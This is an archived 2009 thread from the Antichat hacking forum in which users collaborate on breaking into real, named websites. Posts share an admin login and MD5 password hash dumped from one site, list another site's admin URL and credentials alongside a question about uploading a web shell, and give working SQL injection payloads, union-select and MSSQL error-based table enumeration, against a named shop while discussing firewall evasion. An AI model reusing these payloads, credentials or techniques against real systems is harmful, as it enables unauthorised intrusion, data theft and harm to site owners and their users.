ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

21.02.2009, 00:14
|
|
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме: 393715
Репутация:
90
|
|
pingvit там есть таблица pmr_admins , скорее всего там как раз и хряняться логин с пассом админки, вот логин: admin, вот md5 хэш пароля: 08913870713a4b932d796e47ccaebe8c
P.S. там ещё есть таблицы jos_users, phpbb_users, pmr_users но это все не то...
Последний раз редактировалось pinky07; 21.02.2009 в 00:22..
|
|
|

21.02.2009, 02:40
|
|
Новичок
Регистрация: 19.02.2009
Сообщений: 25
Провел на форуме: 57669
Репутация:
10
|
|
Привет всем)
у меня проблемка. Есть доступ в админку на сайте, я хотел было залить шелл туда но там нет таких полей(ни чего туда не загрузить кроме текста копи-паст, который отправляется в базу)
Мне бы хотелось рипнуть сайт, но как туда залить шелл? или может еще как то можно?
пробовал скуль иньект выдает это: Table 'kalinov_refer.passwords' doesn't exist
может как то скуль надо раскрутить?
|
|
|

21.02.2009, 03:05
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
joomler отвлекись ненадолго от компа, и подумай какого ответа ты сдесь ждёшь?
Вот просто , как , по твоему, на твой вопрос можно ответить? Ни сайта, ни даже названия движка ты не привёл, что там в твоей админке никто не знает, скуль? ну разумеется через скуль можно залиться, при соблюдении определённых условий, которые кстати перечислены в обзоре, линк на который ,в свою очередь, тебе давали выше.
Подвязывай заниматься ерундой, и почитай статьи на форуме. И многое станет ясно, а такими вопросами ты себе знаний не добавишь
|
|
|

21.02.2009, 03:35
|
|
Новичок
Регистрация: 19.02.2009
Сообщений: 25
Провел на форуме: 57669
Репутация:
10
|
|
jokester да наверное поторопился, надо почитать сначало на форуме согласен, но хочется то все и сразу)))))
Исправляю ошибки: 1) Что за движек я так и не понял , возможно он самописный
2) Вот сайт и уязвимый скрипт:
http://referats-online.ru/catalog_44.html?pid=44+union+select+1+from+user 3) В админке кроме редактирования статей и новостей больше ни чего нет. http://referats-online.ru/admin
Логин: 1
Пароль: 1
Ну теперь пойду почитаю топики)))
|
|
|

21.02.2009, 03:49
|
|
Новичок
Регистрация: 18.02.2009
Сообщений: 6
Провел на форуме: 13850
Репутация:
0
|
|
Я вот нашел такое:
http://devicebondage.stockroom.com/category.aspx?category_id=196'
а что с ним делать?
|
|
|

21.02.2009, 08:57
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
_Zeus_, это mssql-inj. почитай статьи, и попробуй докрутить.
кстати, очень удобная скуля для новичка, я в свое время на такой же тренировался.
Последний раз редактировалось faza02; 21.02.2009 в 09:09..
|
|
|

21.02.2009, 09:03
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме: 1571865
Репутация:
571
|
|
Никакая это не mysql.
Это MSSQL.
Код:
http://devicebondage.stockroom.com/category.aspx?category_id=196%20or%201=@@version
Читаем это:
http://forum.antichat.ru/thread30501.html
Последний раз редактировалось R1dex; 21.02.2009 в 09:06..
|
|
|

21.02.2009, 10:57
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме: 812964
Репутация:
302
|
|
Решил попробовать =) MSSQL
http://devicebondage.stockroom.com/category.aspx?category_id=196%20or%201=(SELECT+TOP +1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)
Выдает STORE_USER_ASSN
Дальше через Not in но чета не получается, в чем ошибка?
category_id=196 or 1=(SELECT+TOP+1+TABLE_NAME+FROM+IN FORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(' STORE_USER_ASSN'))--
|
|
|

21.02.2009, 11:16
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
WebKnight Application Firewall Alert
AQTRONIX WebKnight is an application firewall for web servers and is released under the GNU General Public License. It is an ISAPI filter for securing web servers by blocking certain requests. If an alert is triggered WebKnight will take over and protect the web server.
возможно фаер блокирует остальные запросы
|
|
|

21.02.2009, 14:59
|
|
Новичок
Регистрация: 18.02.2009
Сообщений: 6
Провел на форуме: 13850
Репутация:
0
|
|
Да ну, я не верю, что здесь ничего нельзя сделать.
Невозможного не бывает. Жаль, что я в этом нечего почти не понимаю.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|